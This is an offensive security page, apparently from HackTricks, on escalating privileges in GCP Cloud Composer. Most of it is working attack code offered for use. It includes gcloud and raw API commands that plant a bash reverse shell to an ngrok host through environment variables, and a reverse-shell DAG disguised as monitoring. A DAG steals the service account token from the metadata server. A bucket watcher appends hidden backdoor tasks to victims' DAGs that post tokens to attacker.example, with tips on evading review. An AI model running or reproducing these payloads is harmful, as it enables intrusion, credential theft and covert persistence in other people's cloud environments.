GCP - Composer Privesc


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

composer

More information in:

GCP - Composer Enum

composer.environments.create

With this permission it is possible to attach any service account to a newly created Composer environment. Afterwards you can execute code inside Composer (for example from a DAG) to steal the token of that service account.

```bash
gcloud composer environments create privesc-test \
  --project "${PROJECT_ID}" \
  --location europe-west1 \
  --service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com"
```

More information about the exploitation here.

composer.environments.update

It is possible to update a Composer environment, for example by modifying its environment variables. The two variables below abuse Python start-up rather than any Airflow feature: `PYTHONWARNINGS=all:0:antigravity.x:0:0` makes every interpreter import the stdlib `antigravity` module while it parses the warning filter, that module calls `webbrowser.open()`, and `webbrowser` runs whatever command `BROWSER` holds (the trailing `%s` is required so the value is treated as a command line). Every Python process started in the environment therefore spawns the reverse shell:

```bash
# Even if it says you don't have enough permissions the update happens
gcloud composer environments update \
  projects/<project-id>/locations/<location>/environments/<composer-env-name> \
  --update-env-variables="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1' & #%s" \
  --location <location> \
  --project <project-id>
```

The same update sent to the API endpoint directly:

```http
PATCH /v1/projects/<project-id>/locations/<location>/environments/<composer-env-name>?alt=json&updateMask=config.software_config.env_variables HTTP/2
Host: composer.googleapis.com
User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)
Accept-Encoding: gzip, deflate, br
Accept: application/json
Content-Length: 178
Content-Type: application/json
X-Goog-Api-Client: cred-type/sa
Authorization: Bearer [token]
X-Allowed-Locations: 0x0

{"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}
```
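To see why those two variables alone are enough, the following added example (not part of the original page) reproduces the chain locally: it starts an interpreter that executes nothing (`python -c pass`) with the same `PYTHONWARNINGS`/`BROWSER` values and checks that the command smuggled in `BROWSER` ran anyway. It uses `/bin/sh` and a `touch` of a marker file instead of the reverse shell; everything else mirrors what happens on a Composer worker. One caveat worth knowing before you build a payload: `webbrowser` splits `BROWSER` on `os.pathsep` (`:` on Linux), so the command must not contain a colon, which is why the page's payloads use a bare host and `/dev/tcp` rather than an `http://` URL.

```python
import os
import shlex
import subprocess
import sys
import tempfile

XKCD_URL = "https://xkcd.com/353/"  # the URL antigravity passes to webbrowser.open()


def hijack_env(payload: str) -> dict:
    """Build the two variables the Composer update abuses.

    PYTHONWARNINGS: warnings.py resolves the category "antigravity.x" with
    __import__("antigravity"); importing that stdlib module calls
    webbrowser.open(XKCD_URL) as a side effect. The filter is afterwards
    rejected ("Invalid -W option ignored"), but the import already happened.
    BROWSER: webbrowser honours it; because the value contains "%s" it is
    shlex-split into an argv list and started with subprocess.Popen.
    """
    if ":" in payload:
        raise ValueError("BROWSER is split on ':' (os.pathsep); payload must not contain it")
    env = dict(os.environ)
    env["PYTHONWARNINGS"] = "all:0:antigravity.x:0:0"
    env["BROWSER"] = f"/bin/sh -c {shlex.quote(payload)} #%s"
    return env


def browser_argv(browser_value: str, url: str = XKCD_URL) -> list:
    """Reproduce the argv webbrowser.get() builds from a BROWSER value with '%s'.

    (A value whose *last* token is a lone '&' selects BackgroundBrowser
    instead; the page's payloads end in '#%s', so this branch applies.)
    """
    parts = shlex.split(browser_value)
    return [parts[0]] + [arg.replace("%s", url) for arg in parts[1:]]


def run_noop_interpreter(payload: str) -> subprocess.CompletedProcess:
    """Start a Python that executes nothing; only the start-up hooks run."""
    return subprocess.run(
        [sys.executable, "-c", "pass"],
        env=hijack_env(payload),
        capture_output=True,
        text=True,
        timeout=60,
    )


def demo_marker_file() -> bool:
    """True if the no-op interpreter created a marker file through BROWSER."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "pwned")
        run_noop_interpreter(f"touch {shlex.quote(marker)}")
        return os.path.exists(marker)


if __name__ == "__main__":
    print("argv handed to Popen:", browser_argv(hijack_env("id")["BROWSER"]))
    print("marker created by `python -c pass`:", demo_marker_file())
```

The `stderr` of the child shows `Invalid -W option ignored: unknown warning category: 'antigravity.x'`, which is the only trace the trick leaves in the process itself; the command has already run by then. Because the variables are applied environment-wide, the first Python process that starts after the update (scheduler, worker, web server or any task) pops the shell, which is why the update "works" even when gcloud complains about permissions.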

TODO: Get RCE by adding new PyPI packages to the environment

Download DAGs

Check the source code of the DAGs that are being executed:

```bash
mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
```

Import DAGs

Write the Python DAG code to a file and import it by running:

```bash
# TODO: Create dag to get a rev shell
gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py
```

Reverse shell DAG:

```python
# reverse_shell.py
from datetime import datetime, timedelta

from airflow import DAG
from airflow.operators.bash import BashOperator  # airflow.operators.bash_operator on Airflow 1.x

default_args = {
    'start_date': datetime(2024, 1, 1),  # fixed date in the past; catchup=False below prevents backfilling
    'retries': 1,
    'retry_delay': timedelta(minutes=5)
}

dag = DAG(
    'reverse_shell',
    default_args=default_args,
    description='liveness monitoring dag',  # innocuous description to blend in with real DAGs
    schedule_interval='*/10 * * * *',       # re-spawn the shell every 10 minutes
    max_active_runs=1,
    catchup=False,
    dagrun_timeout=timedelta(minutes=10),   # a hung shell is killed before the next run starts
)

# priority_weight has type int in Airflow DB, uses the maximum so the task is scheduled first.
t1 = BashOperator(
    task_id='bash_rev',
    bash_command='bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1',  # attacker listener
    dag=dag,
    depends_on_past=False,
    priority_weight=2**31 - 1,
    do_xcom_push=False)
```
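The `composer.environments.create` section above says the attached service account's token can be stolen by running code inside Composer, and this section shows how a DAG gets there. The following added DAG (example code, not from the original page) does the token theft itself: the worker running the task sits on GCE/GKE with the environment's service account attached, so the GCE metadata server hands out its identity and a bearer token to any process that sends the `Metadata-Flavor: Google` header. The DAG writes the result to the task log, which you can read in the Airflow UI or under the environment bucket's `logs/` prefix. The `SAMPLE_RESPONSES`/`fake_opener` pair is a constructed stand-in for the metadata server so the helper functions can be exercised offline; the DAG wiring only activates where Airflow is importable.

```python
"""token_dump.py: dump the attached service account's identity and access token."""
import io
import json
import urllib.request
from datetime import datetime

METADATA_SA = ("http://metadata.google.internal/computeMetadata/v1/"
               "instance/service-accounts/default/")


def metadata_get(path: str, opener=urllib.request.urlopen) -> bytes:
    """GET one metadata path; the Metadata-Flavor header is mandatory."""
    req = urllib.request.Request(METADATA_SA + path, headers={"Metadata-Flavor": "Google"})
    with opener(req, timeout=5) as resp:
        return resp.read()


def parse_token(body: bytes) -> dict:
    """Keep the fields worth exfiltrating from the /token JSON."""
    data = json.loads(body)
    return {"access_token": data["access_token"], "expires_in": int(data["expires_in"])}


def dump_token(opener=urllib.request.urlopen) -> dict:
    """Return {email, scopes, access_token, expires_in} of the attached SA."""
    email = metadata_get("email", opener).decode().strip()
    scopes = metadata_get("scopes", opener).decode().split()
    return {"email": email, "scopes": scopes, **parse_token(metadata_get("token", opener))}


# Constructed sample responses (not real data) so the helpers run offline.
SAMPLE_RESPONSES = {
    METADATA_SA + "email": b"attack-sa@my-project.iam.gserviceaccount.com",
    METADATA_SA + "scopes": b"https://www.googleapis.com/auth/cloud-platform\n",
    METADATA_SA + "token": b'{"access_token":"ya29.sample","expires_in":3599,"token_type":"Bearer"}',
}


def fake_opener(req, timeout=5):
    """Stand-in for urllib.request.urlopen backed by SAMPLE_RESPONSES."""
    if not req.has_header("Metadata-flavor"):  # urllib capitalises header names
        raise ValueError("metadata server rejects requests without Metadata-Flavor")
    return io.BytesIO(SAMPLE_RESPONSES[req.full_url])


try:  # Resolvable only where Airflow parses the file (the Composer scheduler).
    from airflow import DAG
    from airflow.operators.python import PythonOperator
except ImportError:  # running outside Composer, e.g. to exercise the helpers
    DAG = None

if DAG is not None:
    with DAG("token_dump", start_date=datetime(2024, 1, 1),
             schedule_interval="@once", catchup=False) as dag:
        # print() inside a task lands in the task log, readable from the UI or the bucket.
        PythonOperator(task_id="dump", python_callable=lambda: print(json.dumps(dump_token())))
```

Once you have the token, use it directly against Google APIs (`curl -H "Authorization: Bearer $TOKEN" ...`); the `scopes` value tells you what it is allowed to do, and `expires_in` how long you have before you need another run of the DAG.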

Write Access to the Composer bucket

All the components of a Composer environment (DAGs, plugins and data) are stored inside a GCP bucket. If an attacker has read and write permissions over it, they could monitor the bucket and, whenever a DAG is created or updated, upload a backdoored version so that the Composer environment picks the backdoored version up from storage.

Get more info about this attack in:

GCP - Storage Privesc
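The watcher described above, as an added example that is not part of the original page. It polls the bucket's `dags/` prefix with the `google-cloud-storage` client, and every `.py` object whose generation changed gets a backdoor appended: a snippet that finds every `DAG` object the file defines through `globals()` and attaches one extra `BashOperator` to it, so no parsing of the victim's DAG is required. A marker comment makes the injection idempotent (our own upload is not backdoored again on the next poll), and `if_generation_match` makes the overwrite fail rather than clobber a file the victim updated in between. `BUCKET` and `ATTACKER_URL` are placeholders; the injected task posts the worker's service account token to that URL.

```python
"""Watch a Composer bucket's dags/ prefix and backdoor every DAG that changes."""
import time

MARKER = "# composer-backdoor"
ATTACKER_URL = "https://attacker.example/collect"  # placeholder for your collector

# Appended verbatim to each DAG file. It runs when the scheduler parses the file,
# attaching a task to every DAG object in the module whatever the variable is called.
BACKDOOR = f"""
{MARKER}
from airflow.operators.bash import BashOperator as _BackdoorOp
for _dag in [v for v in list(globals().values()) if type(v).__name__ == "DAG"]:
    _BackdoorOp(
        task_id="healthcheck",
        bash_command=(
            "curl -s -H 'Metadata-Flavor: Google' "
            "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token "
            "| curl -s -X POST --data-binary @- {ATTACKER_URL}"
        ),
        dag=_dag,
    )
"""


def backdoor_source(src: str) -> str:
    """Return src with the backdoor appended exactly once (idempotent)."""
    if MARKER in src:
        return src
    return src.rstrip("\n") + "\n" + BACKDOOR


def changed_blobs(bucket, seen: dict):
    """Yield .py blobs under dags/ whose generation differs from the last poll.

    `bucket` only needs list_blobs(prefix=...) returning objects with .name and
    .generation, which is what google.cloud.storage.Bucket provides.
    """
    for blob in bucket.list_blobs(prefix="dags/"):
        if not blob.name.endswith(".py"):
            continue
        if seen.get(blob.name) != blob.generation:
            seen[blob.name] = blob.generation
            yield blob


def watch(bucket_name: str, interval: int = 30) -> None:
    """Poll the bucket forever and backdoor new or modified DAG files."""
    from google.cloud import storage  # needs google-cloud-storage installed

    bucket = storage.Client().bucket(bucket_name)
    seen: dict = {}
    while True:
        for blob in changed_blobs(bucket, seen):
            src = blob.download_as_text()
            patched = backdoor_source(src)
            if patched != src:
                # Fail instead of overwriting if the object changed since we listed it.
                blob.upload_from_string(patched, if_generation_match=blob.generation)
                seen[blob.name] = blob.generation  # updated from the upload response
        time.sleep(interval)


if __name__ == "__main__":
    watch("us-central1-test-0123abcd-bucket")  # placeholder bucket name
```

Composer syncs the `dags/` prefix to the scheduler and workers on its own, so the backdoored task starts running on the victim DAG's next schedule. A reviewer diffing the bucket will see the appended block, so pick a task id and command that fit the DAG you are hiding in.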

Import Plugins

TODO: Check what is possible to compromise by uploading plugins

Import Data

TODO: Check what is possible to compromise by uploading data
